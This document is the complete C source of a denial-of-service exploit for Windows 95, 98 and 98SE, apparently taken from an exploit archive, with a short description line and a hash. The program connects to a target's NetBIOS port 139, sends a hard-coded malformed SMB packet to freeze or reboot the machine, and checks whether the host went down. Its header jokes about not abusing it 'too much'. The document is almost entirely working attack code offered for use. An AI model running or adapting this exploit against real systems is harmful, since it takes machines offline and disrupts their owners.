Microsoft Windows 95/98/98SE denial of service utility that makes use of malformed NETBIOS packets to lock-up and reboot the machine.
926d171c8c658d8861fb0067abda1bc605fcc9caf1e0a70a1986947d8c097432
/*
Windows 95,98 and 98SE Denial Of Service.
by koper <koper@linuxmail.org>
Uses NetBIOS malformed packets
to freeze/reboot remote mashine.
Don't abuse ... @least not 2much
;>
*/
#include <stdio.h>
#include <stdlib.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <unistd.h>
#include <string.h>
#define PORT 139 //NetBIOS port ... ma sie rozumiec ;)
char kprcode[]= "\x00\x00\x00\x41\xff\x53\x4d\x42\xd0\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x19\x00\x04\x42\x45\x41\x56\x00\x04\x42\x45\x41\x56\x49"
"\x53\x00\x01\x08\x00\x4f\x70\x65\x6e\x20\x59\x6f\x75\x72\x20"
"\x6d\x69\x6e\x64\x2e\x2e\x2e\x20\x61\x6e\x64\x20\x49\x20\x77\x69"
"\x6c\x6c\x20\x62\x65\x20\x74\x68\x65\x72\x65\x2e\x20\x6b\x70\x72\x0a";
struct samba_req
{
char first[5];
char yourname[32];
char sep[2];
char myname[32];
char end[1];
};
void name(char *name1, char *name2);
unsigned long int dns (char *host);
int main(int argc, char *argv[]){
char buf[4000], buf2[4000], myname[33], yourname[33];
struct sockaddr_in piggie;
int soc, soc2, connex, x, x2;
struct samba_req smbreq;
long temp;
printf("\n******************************************************\n");
printf("* Windows 95 && 98 Denial Of Service NetBIOS exploit *\n");
printf("* \t by koper <koper@linuxmail.org> *\n");
printf("******************************************************\n");
printf(" Version: 0.5 - Support for Windows 98 SE\n\n");
if (argc < 3) {
printf("Usage: %s <IP> <NetBIOS name>\n", argv[0]);
printf("NetBIOS name must be in uppercase!\n");
exit(1);}
name("KPR",myname);
myname[30]='A';
myname[31]='D';
name(argv[2],yourname);
yourname[30]='A';
yourname[31]='D';
printf("[+] Trying %s as NetBIOS name %s...\n",argv[1],argv[2]);
printf("[+] Resolving...\n");
temp = dns(argv[1]);
piggie.sin_addr.s_addr = dns(argv[1]);
piggie.sin_family = AF_INET;
piggie.sin_port = htons(PORT);
printf("[+] %s resolved: OK...\n", argv[1]);
soc = socket(AF_INET,SOCK_STREAM,0);
if((connex = connect(soc,(struct sockaddr *)&piggie,sizeof(piggie)))<0){ perror("[+] Error"); exit(1);}
memset(buf,0,4000);
memset(buf2,0,4000);
memcpy(smbreq.first,"\x81\x00\x00\x44\x20",5);
memcpy(smbreq.sep,"\x00\x20",2);
memcpy(smbreq.end,"\x00",1);
strncpy(smbreq.myname,myname,32);
strncpy(smbreq.yourname,yourname,32);
write(soc,&smbreq,72);
x=read(soc,buf,4000);
if(x<1){ printf("[+] Oh my god! There's no responce !?!\n[+] Panic!\n");
exit(1);}
if(buf[0]=='\x82') {
printf("[+] Got responce from remote host...\n");
printf("[+] Initialising attack...\n");}
else {printf("[+] No responce from remote machine (check NBname)...\n[+] Panic!\n"); exit(1);}
write(soc,&kprcode,72);
x=read(soc,buf,4000);
close(soc);
printf("[+] Packet SENT!\n");
printf("[+] Checking hostname...\n");
write(soc,&smbreq,72);
x2=read(soc,buf2,4000);
soc2=socket(AF_INET,SOCK_STREAM,0);
if(connect(soc2,(struct sockaddr *)&piggie,sizeof(piggie))<0)
printf("[+] Host is down... YEAH!\n\n");
else printf("[+] %s is still up, probably not vulnerable...\n\n",argv[1]);
}
void name(char *name1, char *name2)
{ char c, c1, c2;
int i, len;
len = strlen(name1);
for (i = 0; i < 16; i++) {
if (i >= len) {
c1 = 'C'; c2 = 'A';
} else {
c = name1[i];
c1 = (char)((int)c/16 + (int)'A');
c2 = (char)((int)c%16 + (int)'A');
}
name2[i*2] = c1;
name2[i*2+1] = c2;
}
name2[32] = 0;
}
unsigned long int dns (char *host)
{
long i;
struct hostent *he;
i = inet_addr(host);
if (i==-1){
he=gethostbyname(host);
if(he==NULL){
printf("[+] Unable to resolve %s...\n[+] Panic!\n", host);
exit(0);
} else{return(*(unsigned long *) he->h_addr); }
return(i); }
}